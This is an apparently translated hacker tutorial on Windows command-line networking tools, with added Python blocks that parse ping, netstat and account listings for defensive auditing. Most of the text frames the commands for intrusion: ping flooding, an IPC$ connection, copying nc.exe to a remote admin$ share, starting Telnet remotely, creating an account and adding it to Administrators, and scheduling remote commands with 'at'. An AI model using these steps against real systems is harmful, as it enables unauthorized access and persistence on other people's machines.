It is used to check whether the network is reachable and how fast the connection is. For an administrator, or a hacker who lives online, ping is the first DOS command to master. The principle it relies on is that every machine on the network has a unique IP address: we send a packet to the target IP and the other side returns a reply packet. From the returned packet we can tell whether the target host exists, make an initial guess at its operating system, and so on. Let's look at some of its common uses. First the help: in a DOS window type ping /? and press Enter, and the help screen in Figure 1 appears. Here we only need a few basic, useful parameters (below).
-t keeps sending packets to the target IP without interruption until we force it to stop. Imagine you are on a 100M broadband connection and the target IP is on a 56K modem: before long the target goes offline because it cannot cope with that much data. Huh, an attack is that simple.
-l defines the size of the packet sent; the default is 32 bytes, and we can raise it to a maximum of 65500 bytes. Combined with the -t parameter introduced above it is even more effective.
-n defines how many packets are sent to the target IP; the default is 3. If the network is slow, 3 times wastes a lot of our time, and since our purpose here is only to find out whether the target IP exists, set it to 1.
Note: if -t and -n are used together, ping follows whichever parameter comes last, so "ping ip -t -n 3" pings only 3 times even though -t is present. Also, ping does not have to be given an IP; it can ping a host name directly, which also reveals that host's IP.
Below we will give an example to illustrate the specific usage, as shown in Figure 2.
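The reply lines in such a run carry the two values the text goes on to interpret, time and TTL. As an added example (not code from the original article), the block below parses constructed Windows ping output in the style of Figure 2, computes loss and round-trip statistics, and generalizes the TTL rule: since every router decrements TTL by one, the observed value is rounded up to the nearest common starting value to recover both the probable initial TTL and the hop count. The sample lines, the 64 entry in the table (Linux and most modern Unix; not mentioned on the page) and the function names are assumptions made for the example.

```python
import re

# Constructed output of "ping 192.168.0.1" on Windows, in the style of
# Figure 2. Sample lines only, not the page's own capture.
SAMPLE_PING = """
Pinging 192.168.0.1 with 32 bytes of data:

Reply from 192.168.0.1: bytes=32 time=2ms TTL=32
Reply from 192.168.0.1: bytes=32 time=2ms TTL=32
Request timed out.
Reply from 192.168.0.1: bytes=32 time=3ms TTL=32
"""

# Windows prints "time<1ms" for sub-millisecond replies, hence [=<].
REPLY_RE = re.compile(r"Reply from (\S+): bytes=(\d+) time[=<](\d+)ms TTL=(\d+)")

# Initial TTL values operating systems start from. 32, 128 and 255 are the
# cases the text gives (Win98, Win2000, UNIX at 250 = 255 minus 5 hops);
# 64 is an assumption added here for Linux and most modern Unix systems.
INITIAL_TTLS = {32: "Win98", 64: "Linux/modern Unix (assumed)", 128: "Win2000", 255: "UNIX"}


def parse_ping(text):
    """Return (replies, timeouts); each reply is a dict with ip, bytes, ms, ttl."""
    replies, timeouts = [], 0
    for line in text.splitlines():
        m = REPLY_RE.search(line)
        if m:
            replies.append({"ip": m.group(1), "bytes": int(m.group(2)),
                            "ms": int(m.group(3)), "ttl": int(m.group(4))})
        elif line.startswith("Request timed out"):
            timeouts += 1
    return replies, timeouts


def guess_initial_ttl(observed):
    """Smallest common starting TTL at or above the observed one, and the hop
    count implied by the difference. Returns (None, None) above 255."""
    for start in sorted(INITIAL_TTLS):
        if observed <= start:
            return start, start - observed
    return None, None


def summarize(text):
    replies, timeouts = parse_ping(text)
    sent = len(replies) + timeouts
    rtts = [r["ms"] for r in replies]
    ttl = replies[0]["ttl"] if replies else None
    start, hops = guess_initial_ttl(ttl) if ttl is not None else (None, None)
    return {
        "sent": sent,
        "received": len(replies),
        "loss_pct": round(100.0 * timeouts / sent, 1) if sent else None,
        "rtt_min_ms": min(rtts) if rtts else None,
        "rtt_avg_ms": round(sum(rtts) / len(rtts), 1) if rtts else None,
        "rtt_max_ms": max(rtts) if rtts else None,
        "ttl": ttl,
        "probable_initial_ttl": start,
        "hops": hops,
        # Only a hint: the text itself notes the TTL can be changed on the host.
        "os_hint": INITIAL_TTLS.get(start),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_PING).items():
        print(f"{key}: {value}")
```

A TTL of 120 therefore reads as an initial 128 reached over 8 hops, and the 250 of the text as 255 over 5 hops; in both cases the OS label is a hint to be confirmed by other means, never a conclusion.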
Here, time=2 shows that 2 seconds passed between sending the packet and receiving the reply, which gives an idea of the connection speed. The TTL value allows an initial guess at the operating system of the host being pinged; "initial" because this value can be modified. Here TTL=32 suggests the operating system may be Win98. (Tip: if TTL=128 the target host may be Win2000; if TTL=250 the target host may be UNIX.) As for using ping to quickly locate faults in the local network, find the fastest QQ server, or launch ping attacks against others, that is up to you.

2. nbtstat
This command displays protocol statistics and current TCP/IP connections using NetBIOS over TCP/IP. With it you can obtain the NetBIOS information of a remote host, such as user name, workgroup and NIC MAC address. A few basic parameters are needed here.
-a: given just the machine name of the remote host, this parameter returns its NetBIOS information, as shown in Figure 3.
-A: this parameter also returns the remote host's NetBIOS information, but requires its IP. -n lists the NetBIOS information of the local machine.
Once the other side's IP or machine name is known, nbtstat can be used to dig out more of its information, which raises the odds of our intrusion.
3. netstat
This command shows the network status; it is simple to use and powerful.
-a lists all open ports on the local machine, which is an effective way to discover and guard against Trojans and to learn which services the machine is running, as shown in Figure 4.
Here you can see that the local machine runs an FTP service, a Telnet service, a mail service, a web service and so on. Usage: netstat -a IP. -r lists the current routing information, telling us the local machine's gateway, subnet mask and so on. Usage: netstat -r IP.
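The text twice makes the same point about netstat: the -an listing earlier shows which ports are listening and which connections are established, and -a is offered here as the way to notice a Trojan's listener. Reading that listing by hand does not scale, so the following added example (not code from the original article) parses constructed netstat -an output mirroring the earlier screenshot and compares the listening ports against an allow-list of the services the host is meant to run. The allow-list, the sample text and the function names are assumptions made for the example.

```python
from collections import namedtuple

# Constructed "netstat -an" output mirroring the earlier screenshot
# (sample data, not the page's own capture).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    180.254.158.42:139     0.0.0.0:0              LISTENING
  TCP    218.95.49.187:2935     218.89.0.231:80        ESTABLISHED
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1035           *:*
  UDP    0.0.0.0:1037           *:*
  UDP    0.0.0.0:1134           *:*
  UDP    0.0.0.0:1136           *:*
"""

Socket = namedtuple("Socket", "proto local_ip local_port remote_ip remote_port state")


def _split_endpoint(endpoint):
    """'218.89.0.231:80' -> ('218.89.0.231', 80); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """One Socket per TCP/UDP row; banner, header and blank lines are skipped."""
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        local_ip, local_port = _split_endpoint(fields[1])
        remote_ip, remote_port = _split_endpoint(fields[2])
        state = fields[3] if len(fields) > 3 else ""  # UDP rows carry no State column
        sockets.append(Socket(fields[0], local_ip, local_port, remote_ip, remote_port, state))
    return sockets


def listening_ports(sockets):
    """(proto, port) pairs that accept traffic: LISTENING TCP ports and every
    bound UDP port, since UDP has no connection state to filter on."""
    return sorted({(s.proto, s.local_port) for s in sockets
                   if s.proto == "UDP" or s.state == "LISTENING"})


def established(sockets):
    """Live TCP connections as (local_ip, local_port, remote_ip, remote_port)."""
    return [(s.local_ip, s.local_port, s.remote_ip, s.remote_port)
            for s in sockets if s.proto == "TCP" and s.state == "ESTABLISHED"]


def unexpected_listeners(sockets, allowed):
    """Listeners outside the allow-list of services the host is documented to run.
    The allow-list is the reviewer's knowledge of the host's role, not derived from netstat."""
    return [entry for entry in listening_ports(sockets) if entry not in allowed]


if __name__ == "__main__":
    # Assumed role for the sample host: RPC, NetBIOS session, SMB and IKE only.
    ALLOWED = {("TCP", 135), ("TCP", 139), ("TCP", 445), ("UDP", 500)}
    sockets = parse_netstat(SAMPLE_NETSTAT)
    print("established:", established(sockets))
    print("unexpected listeners:", unexpected_listeners(sockets, ALLOWED))
```

Run on a real host, the unexpected list is the set of ports to account for one by one, ideally together with the owning process (netstat -o on later Windows versions, which this page does not cover); a listener nobody can explain is exactly the Trojan case the text warns about.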
4. tracert
Tracks routing information. Use this command to find every hop a packet passes through on its way from the local machine to the target host, which helps a great deal in understanding the layout and structure of the network. See Figure 5.
Here the data goes from the local machine to the machine 192.168.0.1 with no relay in between, which shows that the two machines are on the same local network. Usage: tracert IP.
5. net
This is the most important of the network commands. The usage of every subcommand must be understood thoroughly, because it is so powerful that it is practically the best intrusion tool Microsoft provides us. First let's look at all of its subcommands: type net /? and press Enter, as shown in Figure 6.
Here we concentrate on a few subcommands commonly used in intrusions.
net view
Use this command to see the resources a remote host is sharing. The command format is net view \\IP. See Figure 7.
net use maps a shared resource of a remote host to a local drive letter, which is more convenient than the graphical interface, huh. The command format is net use x: \\ip\sharename. In the figure, the first command maps the share named magic on IP 192.168.0.5 to the local Z: drive. The second establishes an IPC$ connection with 192.168.0.7 (net use \\IP\ipc$ "password" /user:"name"), as shown in Figure 8.
Once the IPC$ connection is up, huh, you can upload files: copy nc.exe \\192.168.0.7\admin$ sends nc.exe from the local directory to the remote host, and combined with the other DOS commands introduced later the intrusion can proceed.
net start launches a service on the remote host. Once you have a connection to the remote host and find that a service you want to use is not running, start it with this command. Usage: net start servicename; in Figure 9 the Telnet service is started successfully. net stop: what if, after getting in, you find a service on the remote host that is in your way? Stop it with this command; its usage is the same as net start.
net user handles everything related to accounts: adding accounts, deleting accounts, viewing a specific account, activating accounts, disabling accounts and so on. This is very useful to our intrusion, and it is the prerequisite for cloning an account. Typing net user with no parameters lists all users, including disabled ones. Explanation:
1. net user abcd 1234 /add creates an account named abcd with password 1234, by default a member of the Users group.
2. net user abcd /del deletes the user named abcd.
3. net user abcd /active:no disables the user named abcd.
4. net user abcd /active:yes activates the user named abcd.
5. net user abcd shows the details of the user named abcd, as in Figure 10.
net localgroup views everything related to user groups and performs the related operations. Typing net localgroup with no parameters lists all current user groups. During an intrusion we generally use it to add an account to the Administrators group, so that we can control the whole remote host with that account. Usage: net localgroup groupname username /add, as in Figure 11.
Now add the newly created user abcd to the Administrators group; abcd is now a super administrator, huh, and net user abcd shows its status, as can be seen in Figure 10. But this is far too obvious: the network administrator spots the flaw at a glance when viewing users, so this method only works against rookie administrators, though we still need to know it. The current approach is to use other tools and methods to clone a super administrator the administrator cannot see, which comes later. Interested friends can refer to "Wanted Deep Solvement Account" in issue 30 of "hacking line".
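The text's own caveat, that an administrator who looks at the user list sees the new account at once, is the defensive point of this section: a scheduled comparison of net user and net localgroup administrators output against a recorded baseline turns that glance into a check that runs without anyone remembering to look. The following is an added example, not code from the original article; the two constructed listings, the baseline sets and the function names are assumptions made for the example.

```python
import re

# Constructed output of "net user" and "net localgroup administrators" on a
# host after the steps described above (sample data, not the page's own).
SAMPLE_NET_USER = r"""
User accounts for \\A-01

-------------------------------------------------------------------------------
abcd                     Administrator            Guest
The command completed successfully.
"""

SAMPLE_NET_LOCALGROUP = r"""
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
abcd
Administrator
The command completed successfully.
"""

# Baseline recorded on a known-good day (assumed values for the example).
BASELINE_USERS = {"Administrator", "Guest"}
BASELINE_ADMINS = {"Administrator"}


def _listing_body(text):
    """Yield the lines between the dashed rule and the trailing status line,
    which is where both commands place the actual list."""
    in_body = False
    for line in text.splitlines():
        if line.startswith("---"):
            in_body = True
            continue
        if line.startswith("The command"):
            break
        if in_body and line.strip():
            yield line.rstrip()


def parse_net_user(text):
    """'net user' prints several names per line, separated by runs of spaces."""
    names = set()
    for line in _listing_body(text):
        names.update(re.split(r"\s{2,}", line))
    return names


def parse_net_localgroup(text):
    """'net localgroup <group>' prints one member per line."""
    return set(_listing_body(text))


def diff_against_baseline(current, baseline):
    """Names that appeared or vanished since the baseline was recorded."""
    return {"added": sorted(current - baseline), "removed": sorted(baseline - current)}


def audit(net_user_text, net_localgroup_text):
    """Report account and Administrators-group drift in one structure."""
    return {
        "users": diff_against_baseline(parse_net_user(net_user_text), BASELINE_USERS),
        "administrators": diff_against_baseline(
            parse_net_localgroup(net_localgroup_text), BASELINE_ADMINS),
    }


if __name__ == "__main__":
    for section, drift in audit(SAMPLE_NET_USER, SAMPLE_NET_LOCALGROUP).items():
        print(f"{section}: added={drift['added']} removed={drift['removed']}")
```

An account that shows up in both "added" lists at once, as abcd does here, is precisely the pattern the text describes; the cloned-account technique it alludes to is designed not to appear in these listings, which is why the baseline check is a first line, not the last.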
net time shows the current time of the remote host. If your goal is only to get into the remote host, you may never need this command. But is simply getting in all there is to an intrusion? We need to penetrate further, and that requires knowing the remote host's current time, because together with other means (later) we can make a command or program start at a set time, laying the groundwork for further intrusion. Usage: net time \\IP. See Figure 12.
6. at
This command schedules a specific command or program to run at a set time (now you see why net time matters). Once we know the remote host's current time, we can use this command to run a program or command a certain time later (for example 2 minutes). Usage: at \\computer time command. See Figure 13.
This means the computer named A-01 starts the Telnet service at 6:55; net start telnet is the command that turns the Telnet service on.
7. ftp
Everyone should be fairly familiar with this command. Many hosts on the Internet offer anonymous FTP, meaning anyone can log in. Now, if you scan up a host with an open FTP service (generally a machine with port 21 open) and still cannot use the ftp command, what then? The basic usage of the ftp command is given below. First type ftp and press Enter to enter ftp; at the ftp prompt you can type help to view the help (the help of any DOS command can be viewed this way), as shown in Figure 14. Everyone may wonder how to use so many commands. In fact only a few basic ones need to be mastered.
First is the login procedure, which uses open: at the ftp prompt enter "open host-IP ftp-port"; the port is generally 21 and can then be left out. Then enter a valid user name and password to log in; here anonymous FTP is used as the example, as shown in Figure 15.
The user name and password are both ftp, and the password is not echoed. When the prompt says **** logged in, the login succeeded. Here it is an anonymous login, so the user is shown as anonymous.
Next, the usage of the specific commands, as shown in Figure 16.
dir is the same as the DOS command and lists the server's files; type dir and press Enter to see the files on this FTP server. cd enters a directory. get downloads a file to the local machine. put uploads a file to the remote server; this depends on whether the remote FTP server gives you write permission, and if it does, huh, how to use that goes without saying, everyone is free to play. delete deletes a file on the remote FTP server; this also requires write permission. bye exits the current connection. quit does the same.
8. telnet
A powerful remote login command that almost every intruder loves; nobody who has tried it dislikes it. Why? It is easy to operate, just like using your own machine: as long as you are familiar with DOS commands, after connecting to the remote machine as Administrator you can do whatever you want with it. Let's see how to use it: first type telnet and press Enter, then type help to view its help, as shown in Figure 17.
Then at the prompt type open IP and press Enter; a login window appears asking for a valid user name and password, and whatever password you type here is not echoed, as shown in Figure 18.
Once the user name and password are accepted, the Telnet connection is established and you have the same permissions on the remote host as that user, so you can do whatever you want using DOS commands, as shown in Figure 19. Here I logged in with super administrator privileges.
Learning DOS is a great help to becoming a good network administrator; in particular, become proficient in some of the network DOS commands. Everyone should also understand that anyone who wants to get into a system must have a valid user name and password (that way in is almost extinct), and even an account with only minimal permissions can be used to reach the final goal. Therefore resolutely eliminate empty passwords and give your accounts strong passwords: that is the best defence against intrusion. Finally, and sincerely: cultivating good security awareness is the most important thing of all.